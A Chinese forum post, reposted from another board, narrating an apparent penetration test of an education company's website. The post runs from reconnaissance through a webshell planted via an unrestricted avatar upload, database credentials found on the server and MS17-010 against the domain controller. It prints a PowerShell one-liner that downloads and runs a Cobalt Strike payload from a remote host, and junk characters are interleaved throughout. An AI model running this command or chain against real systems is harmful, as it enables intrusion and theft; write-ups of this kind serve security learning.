|
1 z2 j$ _- c* F
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
' B( { x! c1 z# V: _5 y { $ e* D4 o/ n9 x9 l+ l
1 }9 ^' u8 U: ?9 S6 v
8 ~$ Y" S' O9 r2 Q
# n4 X; d! a4 c; G* O6 A0 X
, k" L4 X X* B; @ 正文
5 N: X$ F% i* D0 E" U' V * O' }& @8 m2 y* q4 R: J5 ~
( i) h/ E; {; A9 [ ; S6 t% F4 P/ ^( a( z8 p
5 T8 M6 N4 `* E; e3 O4 J3 I7 U
0 ]" `2 B9 H+ A: Z7 g" Z0 s 目标:www.xxxx.com(一家教育机构)
4 P/ i ?1 i K# }" N
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# M& V: s$ d, D) B9 [
. Y1 C$ z! U2 O
" K+ ~( c: |. o- r x, U 
$ ~4 C1 { L7 n' [ - S3 J% o2 K k1 y
. O5 Z& O% h) f4 }4 Q7 K 进行了简单的信息搜集
& n* C2 \% \: u9 _/ e7 w$ T
2 @* b( c% l b$ i2 Q
. X, R" s# [0 n8 T" X) |
" R6 ]8 v9 ?8 y: I* H; D# K& z, B' Y
子域名搜集6 f% W: V! |8 w, m: t7 _$ ^
8 P* D; N. b& z; k- @! Z8 L, k- P0 w0 U7 {
 3 a7 O2 g* A/ ]
4 d" ^9 I# U5 z* I7 r
, S k: L. O; R1 e& ?$ ]& c3 ~ fofa找资产
% H6 e/ s7 m: W, d/ R. v' _5 @( e
5 ?! W* Z1 D+ }+ }# e1 U" `$ @5 r% T6 J" k v# O
% D" Z0 z/ `5 z7 q0 {% c n
) ]2 i: ~4 f" I
4 l3 o: f A9 i3 q V
1 G6 e' A9 S- J. A5 G+ L" H M! y+ P F$ y& a- ]
一共七个资产。去重之后只有两个。
, Q* P4 V1 s J5 r _1 a, m( L
5 J! c$ ^( I3 l, t: |& N2 A/ M- P4 z8 S+ U
% V+ }4 F5 B: Y4 M% n
5 e0 y& ^0 y' z2 t a7 ~6 g 目录探测3 u8 a% r- P" U2 y2 K' {8 [
6 j; N/ s8 w# P- [+ }6 C1 I+ O
 # O; V8 l% j6 I) K6 f
5 `! M; J8 T' ]' g" R. e! q
0 W# C% O4 R1 S* t2 K 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' [4 G. Q( G# @( {
z7 S* c/ G0 t$ i
/ |; H) J5 }* F: i- ^! c! q
, L; B4 S9 R# G) J
3 H* F" b O* [* `" p- L1 U 我又尝试了通过修改返回包来绕过登录界面
0 Q$ V" ^4 O9 V# _ * X8 s% ~/ x* J+ x" Q3 f3 o1 a
0 S) N. B5 @. r6 L  5 W8 M2 @% A5 t( e
/ M# G3 b M: Q' U
2 I' `4 _ q% W: Z
还是不行,尝试注入无果
; y3 i6 j/ H* _6 L - w7 I0 n% Z6 d$ k! m# L
9 u0 P6 P; o9 X5 v' ~" @) T) A 
# G# y8 s& o! q0 m. f0 i" I1 E & E1 x3 b6 |! F, N
2 m; o- _! r5 ]
不过我目录探测出了一处Spring信息泄露
, `9 S7 Z& k% `- u$ V" j; J
9 T6 b. _! Z) d& ^5 W
0 W) T' f. Z% U8 p' t+ N0 W
n( s, L; Y7 L4 y8 T1 v
& [( ~' J7 }8 D/ i  7 e: _, y5 n" f. N# j4 m
0 [, j$ n) n: U
2 ]' j4 C8 r8 l 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录7 l8 h4 L0 c% t( L5 K1 q+ y
% u! f* f0 `3 X0 `) U/ w1 b1 t* K& n0 O' ~( l
 ) N0 ^0 c, ]* f" u ~
& n, B. C% C( S# x/ M5 I8 s
( v4 J+ }3 q( [* Y4 ?+ d
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
! `8 X# S: L2 x1 r, o7 B) `
# ~' q3 l L! O' E5 e/ H$ K/ m7 H4 R2 L
 ! Y" `0 j: I5 @1 L6 Q1 B( x
' j2 N: l1 g3 A' |
/ z, ^3 u3 C Q" o! W/ T7 G! I
获取有些师傅到这一步就手机抓包电脑测了。
6 f5 L: `- }$ |7 _3 a' k ; K9 m0 C, G7 K5 v, W
: p. A! |& [& V" e Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 u e% _/ {. i% f/ m. A
; l5 k$ ^! K; x$ h# z7 e
, D- V3 t' o; q* y; O5 I6 [
其中在一个公众号发现了小程序,可以进行注册。
# R3 H( ^ X" |! Z+ C ) O- K9 q' j: o2 H" g& u+ {
. p$ R3 r8 J% s! s/ r
看到了头像上传,尝试上传获取WebShell" s1 D I/ ]5 i! A! }
3 W, L. n, `" `* ?9 @* S7 n C
; Y- N1 z6 s. n6 k; K9 [( l1 y( E 
& r! h( M# d9 ` V 6 n' b- P5 L4 F. i/ k0 r& m
# Q: l5 P& {' u- [3 j2 _
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问2 ]; t. \: ?$ ^' K( T# _( N
4 k$ O h3 l9 }+ N7 F$ Y
$ t" h, A& J. C6 c+ W5 X j
6 G h! z$ H* s; l
: r* w* b1 j/ q) ]* D# ~& ?6 _: ]) \6 A0 D0 H
然后上了大马. n5 M3 _# K3 V* a6 J4 J' h% ?
6 K9 c' v1 `2 |/ A3 c5 v2 p1 j2 B( V- D+ N
" @" T, ?7 c/ F5 ^0 @- G7 d' |5 j 0 ~8 M; R; s( P' {3 X
: r+ `' E' O) l5 Z  ! K _' i$ ^7 d7 [; l
1 U4 V6 ^4 Q: G
) |. [$ z9 D+ B9 Z1 e. [
通过翻找文件发现数据库账号密码
4 ~! m* k$ |$ T7 h6 h3 P/ H5 |
+ F$ s1 X" H* |: |, a" l7 x' B1 T9 @4 Q. X0 F8 k; p {
 9 [! n! ] O$ @ |
! e) F5 [. z$ o; q' [8 z* m/ C t
; G# B% h( ^2 R! K& B7 y+ u --内网渗透
$ w/ E" C+ j' G# { + M& p! A% X8 O/ O7 O5 y
6 S# q7 _2 H, B. A8 W 直接通过powershell执行 cs上线" B" }1 _% [5 c0 Q* F" S6 u
1 Z7 V6 J7 g# v' n V! v% ?# A- w+ E9 I, W& d) m- v
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
: H, e/ h. u ~7 p% Q 5 v0 i2 x- A$ H6 P1 S0 x! F* E
2 Z7 I0 p9 {0 x' j' Y 
) D: B( b8 C6 {
( Z* E) c5 M* Y$ ?% d! z
, _( s- a. X! J, q& N 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破3 N# [* c2 }1 @* u
- O% u2 U, o# V* ~3 W' P
/ x4 E' G- x! ~; Q. Q3 C
 9 Y" A' A8 V4 Q; ~0 K
1 S' Z4 G. ]2 ?# C" F
Y! c' W+ j9 B
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& I* `# A c. P) s# i4 N& M' ^ g# j
2 s g) p! s8 z3 Z9 Y
/ e/ k _' p! |
/ s4 R1 F9 u( a' |- j6 u
! l( n! B8 P9 G9 R9 z
# }8 J! d- f; R 
' g# ]" x- Q: g) A1 G# e8 l* |+ E
R2 F1 g# d9 ]) u7 j9 n1 @4 I
0 Y" ?+ q H( ~( f, y& I; g6 y& D' E 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ }- w) M5 B& S$ v
' f- i+ y' b1 V' t1 n
4 s; \( y9 E9 A: A - ]7 v) q; h( l$ V
* q* h* ~; e! v! i2 `1 Q8 m5 {
, ~* C5 U$ J& w" ]9 P0 l 9 S- c4 ?5 d& c* f
5 F) s/ T; Z7 _5 z8 g: b; x
: T6 ]6 p, v1 ~9 g& u
% L& r; N; y; N% S
' r8 t& O) S8 H0 p. h& k& v/ B ) [! B+ z3 _* I h$ U8 [+ f$ |8 v. r
" o. l1 b; N6 Z8 f; W& P
# g) E7 I$ ^0 @, H9 {% F5 @ 2 A6 V0 t5 B+ s4 I- g L
3 ~/ U& O: U: S- e' m 小结) W8 b' `% u3 Z. T6 C
7 G3 K7 d: j7 X9 v' z) O7 U0 d+ o% t& r- E0 k4 M
, B9 I# |1 e7 O" g* v4 |* x2 [: Z& n : ^9 E/ j; q: D+ H
2 \3 v6 ?% _0 L4 q" F
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!; ] L4 |) @3 b/ c. C3 |
+ C8 ^+ C5 i, N( |9 I6 W% _% e
! W5 f% m, r J0 Y4 ~
) h" @/ @& d0 R7 T& |/ ?
' B: ~& F- H! O, b. _# _; G, h) P3 b2 ~
-
1 P9 O" l J" c4 y K$ `' j: W 5 L1 M' b9 ^& W* [4 r
e& m. s8 h$ [: p
-
3 {8 ~2 R4 W3 e- b4 k8 ?
# a" ?7 }. h! V- ]
' n' V/ N: G0 I8 I2 U; k# c
0 Q; h' A' k9 k: W7 g. ^9 z( d
J& R+ R. X# ]# U' C
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
5 J( t' O8 j/ b3 V D9 n 1 {2 l( ^2 @7 A2 p- V
1 Y$ ]( C* b# Z2 |9 \7 m4 v, F
1 ~! x6 M t7 X c* A; K5 z5 l$ s | 
发表于 2024-3-1 19:41:32
收藏
支持
反对